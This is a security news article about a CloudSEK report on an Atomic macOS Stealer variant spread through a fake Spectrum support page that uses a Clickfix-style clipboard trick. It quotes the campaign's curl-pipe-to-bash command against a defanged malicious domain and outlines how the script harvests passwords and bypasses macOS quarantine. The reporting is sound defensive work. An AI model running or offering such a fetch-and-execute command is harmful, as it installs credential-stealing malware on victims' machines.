Clickfix Meets macOS: AMOS Variant Targets Spectrum Users in Credential Harvesting Campaign

Researchers at CloudSEK have uncovered a new variant of the Atomic macOS Stealer (AMOS) targeting macOS users with a clever multi-platform social engineering campaign. Using typo-squatted domains impersonating Spectrum, a U.S. telecom giant, the attackers deployed a Clickfix-style verification trick that installs malicious payloads depending on the victim’s operating system.

“This campaign highlights an increasing trend in multi-platform social engineering attacks targeting both consumer and corporate users,” CloudSEK warned.

When users land on a fake Spectrum support site and click the familiar “Alternative Verification” button, a command is copied to their clipboard. The response varies by OS:

• Windows users receive a PowerShell command that downloads and executes a script.
• macOS users are served a shell command like:
• Pastacode

  Provider: Write code
  Syntax: Bash

  /bin/bash -c "$(curl -fsSL https://applemacios[.]com/getrur/install.sh)"

• The script (install.sh) then:
  1. Prompts the user for their system password repeatedly until correct
  2. Stores the password in /tmp/.pass
  3. Downloads a second payload (update) identified as an AMOS variant
  4. Bypasses security using sudo -S xattr -c
  5. Executes the malware

“The script uses native macOS commands to harvest credentials, bypass security mechanisms, and execute malicious binaries,” CloudSEK noted.

AMOS, also known in its variant forms as Poseidon and Odyssey, is growing in popularity among cybercriminals for its stealth and efficiency. The version uncovered here uses:

• Legitimate macOS utilities (dscl, xattr, sudo) to fly under endpoint radar
• Session logic bugs and typo-squatted domains to appear convincing
• Poorly coded front-ends that still deceive average users (e.g., Linux agents receiving Windows instructions)

Russian-language comments in the delivery script further suggest that the campaign is likely run by Russian-speaking cybercriminals.

With AMOS adapting rapidly and campaigns blending cross-platform deception with credential harvesting, even non-Windows users are no longer safe. As CloudSEK researchers warned: “Stolen credentials and persistent access may be sold to access brokers or used for follow-on attacks such as ransomware or data exfiltration.”

Related Posts:

• AMOS Stealer Reloaded: Inside a Fully Undetected macOS Data Heist
• Typo DGAs: A New Tactic in Malicious Redirection Campaigns
• Atomic Stealer Malware Returns in New Disguises, Targets Mac Users’ Sensitive Data
• New Mac Stealer “AMOS” Poses as Loom Screen Recorder, Targets Crypto Wallets